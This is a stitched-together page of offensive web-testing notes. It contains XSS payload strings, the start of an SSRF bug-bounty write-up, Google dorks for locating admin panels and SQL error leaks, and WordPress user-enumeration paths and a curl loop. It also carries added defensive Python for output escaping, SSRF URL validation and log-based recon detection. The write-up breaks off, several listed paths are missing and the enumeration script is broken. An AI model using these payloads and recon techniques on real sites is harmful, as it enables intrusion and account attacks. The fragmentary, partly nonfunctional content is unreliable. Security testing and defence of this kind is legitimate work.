Best XSS Vectors

Here’s a small #XSS list for manual testing (main cases, high success rate).

 "><img src onerror=alert(1)> 
"autofocus onfocus=alert(1)//

Try it on:
- URL query, fragment and path
- all input fields
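Both vectors above rely on an unencoded double quote to escape a quoted attribute, which is why encoding only angle brackets is not enough. The following Python script is an added example (not from the original list or its author) that reflects each vector into a value attribute once with a naive encoder and once with full attribute encoding; the regex in it is an assumed, rough model of how a browser tokenizes the attribute, not a real HTML parser.

```python
import html
import re

# Constructed samples: the two vectors from the list above.
VECTOR_TAG = '"><img src onerror=alert(1)>'
VECTOR_ATTR = '"autofocus onfocus=alert(1)//'


def naive_escape(value: str) -> str:
    """Encode only angle brackets. A common shortcut that stops new tags
    but not break-outs from a quoted attribute."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


def attribute_escape(value: str) -> str:
    """Full attribute encoding: &, <, >, " and ' (html.escape with quote=True)."""
    return html.escape(value, quote=True)


def render_input(value: str, escaper) -> str:
    """Reflect user input into a quoted value attribute, as an echoed form field does."""
    return f'<input name="q" value="{escaper(value)}">'


# Assumed rough model of the browser tokenizer (not a real HTML parser):
# the attribute value ends at the first unencoded double quote, and whatever
# follows up to '>' is parsed as further attributes of the same element.
_INPUT_RE = re.compile(r'value="([^"]*)"([^>]*)>')


def attribute_and_leftover(value: str, escaper):
    """Return (decoded value attribute as the browser sees it, attacker-controlled leftover)."""
    m = _INPUT_RE.search(render_input(value, escaper))
    return html.unescape(m.group(1)), m.group(2).strip()


def attribute_is_contained(value: str, escaper) -> bool:
    """True when the whole input stays inside the attribute and decodes back unchanged."""
    decoded, leftover = attribute_and_leftover(value, escaper)
    return leftover == "" and decoded == value


if __name__ == "__main__":
    for name, escaper in (("naive", naive_escape), ("attribute", attribute_escape)):
        for vector in (VECTOR_TAG, VECTOR_ATTR):
            _, leftover = attribute_and_leftover(vector, escaper)
            print(f"{name:9} | contained={attribute_is_contained(vector, escaper)!s:5} | leftover={leftover!r}")
```

With the naive encoder both vectors leave an event-handler attribute outside the quoted value; with full attribute encoding both stay inside it and decode back to the original string, which is the behaviour a templating engine's attribute context should give by default.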

From the BruteLogic Twitter account:

SSRF | Reading Local Files from DownNotifier server

Hello guys, this is my first write-up and I would like to share it with the bug bounty community. It's an SSRF I found some months ago.

DownNotifier is an online tool to monitor website downtime. This tool sends an alert to the registered email and SMS when the website is down.

DownNotifier has a BBP on Openbugbounty, so I decided to take a look. When I browsed to the website, I noticed a text field for a URL, and an SSRF vulnerability quickly came to mind.
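A URL field that the server fetches on the user's behalf is exactly the input a monitoring service must validate before fetching. The Python below is an added example of that validation, not DownNotifier's code or anything from the write-up: it restricts the scheme to http/https (so file: and similar local readers are refused), rejects embedded credentials, resolves the host and refuses any loopback, private, link-local or otherwise non-public address, including IPv4-mapped IPv6 forms. The resolver parameter is assumed so that the check can run offline with constructed answers.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(host: str) -> set:
    """Default resolver: every A/AAAA address the host currently resolves to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(text: str) -> bool:
    """Reject loopback, private, link-local (cloud metadata), multicast, reserved
    and unspecified addresses; unwrap IPv4-mapped IPv6 so ::ffff:127.0.0.1 is caught."""
    ip = ipaddress.ip_address(text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_monitor_url(url: str, resolver=resolve_all):
    """Return (accepted, reason) for a user-supplied URL the server would fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    try:
        # A literal address needs no DNS; a name is resolved to all its addresses.
        ipaddress.ip_address(host)
        addresses = {host}
    except ValueError:
        try:
            addresses = resolver(host)
        except OSError as exc:  # socket.gaierror is an OSError
            return False, f"cannot resolve {host!r}: {exc}"
    if not addresses:
        return False, f"{host!r} resolved to no addresses"
    for address in addresses:
        if not is_public_address(address):
            return False, f"{host!r} resolves to non-public address {address}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed resolver answers; no network needed.
    public = lambda h: {"93.184.216.34"}
    for candidate in ("https://example.com/status", "file:///etc/hosts",
                      "http://127.0.0.1:8080/", "http://[::ffff:127.0.0.1]/",
                      "http://169.254.169.254/"):
        print(candidate, "->", validate_monitor_url(candidate, resolver=public))
```

Two caveats a reviewer would raise: the address checked here must be the one actually connected to (otherwise a DNS answer that changes between validation and fetch, or a redirect, bypasses the check), so the fetch should pin the validated address and re-run the validation on every redirect hop instead of following them blindly.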

Collection of information | Google Hacking and Dorks basics

Find the login panel
site: inurl: admin | administrator | adm | login | l0gin | wp-login

Find pages leaking SQL error messages:
site: intext: "sql syntax near" or
"syntax error has occurred" or
"incorrect syntax near" or
"unexpected end of SQL command" or
"Warning: mysql_connect ()" or
"Warning: mysql_query ()" or
"Warning: pg_connect ()" or
"Warning: mysql_fetch_array ()" or
"MySQL Query Failed"

WordPress basic auditing

WordPress readme

WordPress license (discloses the WordPress version)

WordPress sample config:

WordPress installation:

WordPress upgrade file:

WordPress setup config:

WordPress API useful paths:
target/wp-json/wp/v2/users - enumerate users
target/wp-json/wp/v2/posts - enumerate posts
target/wp-json - WordPress API root

Script to enumerate users through the blog's authors (the per-author request URL was lost when this page was extracted, so the loop variable is not used below; the regex quantifiers and quotes are restored):
TARGET="https://target"   # placeholder for the site under test
for i in {1..30}; do
  # Supply the blog's per-author URL built from $i in place of "$TARGET".
  curl -s -L -i "$TARGET" \
    | grep -E -o '" title="View all posts by [a-zA-Z0-9.-]*|Location:.*' \
    | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v '^$'
done

WordPress plugin readme or license:
target/wp-content/plugins/plugin-name/readme.txt or /license.txt

WordPress theme readme or license:
target/wp-content/themes/theme-name/readme.txt, /changelog.txt or /license.txt
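Seen from the other side, the probes listed in this section (author enumeration, the REST users endpoint, and the readme/license/setup files) leave a very recognisable pattern in the web server log. The Python below is an added example, not part of the original notes, that runs a simple detector over constructed Apache combined-format lines; the disclosure file paths are the standard WordPress locations and are assumed here, and the threshold of four distinct author ids is an arbitrary tuning value.

```python
import re
from collections import defaultdict

# Constructed Apache combined-format lines (sample data, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [10/May/2021:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "curl/7.68.0"
198.51.100.7 - - [10/May/2021:10:00:01 +0000] "GET /author/admin/ HTTP/1.1" 200 5120 "-" "curl/7.68.0"
198.51.100.7 - - [10/May/2021:10:00:02 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "curl/7.68.0"
198.51.100.7 - - [10/May/2021:10:00:02 +0000] "GET /?author=3 HTTP/1.1" 301 0 "-" "curl/7.68.0"
198.51.100.7 - - [10/May/2021:10:00:03 +0000] "GET /?author=4 HTTP/1.1" 404 1200 "-" "curl/7.68.0"
198.51.100.7 - - [10/May/2021:10:00:03 +0000] "GET /?author=5 HTTP/1.1" 301 0 "-" "curl/7.68.0"
198.51.100.7 - - [10/May/2021:10:00:04 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 2210 "-" "curl/7.68.0"
198.51.100.7 - - [10/May/2021:10:00:05 +0000] "GET /readme.html HTTP/1.1" 200 7300 "-" "curl/7.68.0"
203.0.113.5 - - [10/May/2021:10:01:00 +0000] "GET /about/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2021:10:01:02 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
AUTHOR_RE = re.compile(r'^/(?:index\.php)?\?author=(\d+)$')
USER_API_RE = re.compile(r'^/wp-json/wp/v2/users(?:/|\?|$)')
# Standard WordPress files that disclose the version or setup state (assumed paths).
DISCLOSURE_FILES = {"/readme.html", "/license.txt", "/wp-config-sample.php",
                    "/wp-admin/install.php", "/wp-admin/upgrade.php", "/wp-admin/setup-config.php"}


def parse_line(line: str):
    """Parse one combined-format line into ip, request target and status; None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "target": m["target"], "status": int(m["status"])}


def detect_enumeration(lines, author_threshold=4):
    """Return {ip: [reasons]} for clients whose requests look like WordPress recon."""
    author_ids = defaultdict(set)      # ip -> distinct ?author= ids requested
    api_hits = defaultdict(int)        # ip -> requests to the REST users listing
    disclosure_hits = defaultdict(set) # ip -> version/setup files probed
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["target"]
        m = AUTHOR_RE.match(path)
        if m:
            author_ids[rec["ip"]].add(int(m.group(1)))
        elif USER_API_RE.match(path):
            api_hits[rec["ip"]] += 1
        elif path.split("?", 1)[0] in DISCLOSURE_FILES:
            disclosure_hits[rec["ip"]].add(path.split("?", 1)[0])
    findings = defaultdict(list)
    for ip, ids in author_ids.items():
        if len(ids) >= author_threshold:  # one ?author= hit is normal browsing, a sweep is not
            findings[ip].append(f"author id enumeration: {len(ids)} distinct ids ({min(ids)}-{max(ids)})")
    for ip, n in api_hits.items():
        findings[ip].append(f"REST user listing requested {n}x")
    for ip, files in disclosure_hits.items():
        findings[ip].append("version/setup file probes: " + ", ".join(sorted(files)))
    return dict(findings)


if __name__ == "__main__":
    for ip, reasons in detect_enumeration(SAMPLE_LOG.splitlines()).items():
        print(ip)
        for reason in reasons:
            print("  -", reason)
```

The single `?author=1` request from the second client stays below the threshold, so only the sweeping client is reported. Detection of this kind complements, rather than replaces, the mitigations: the sample config, install and upgrade files should not be reachable on a deployed site, and the REST users listing should not be served to unauthenticated clients.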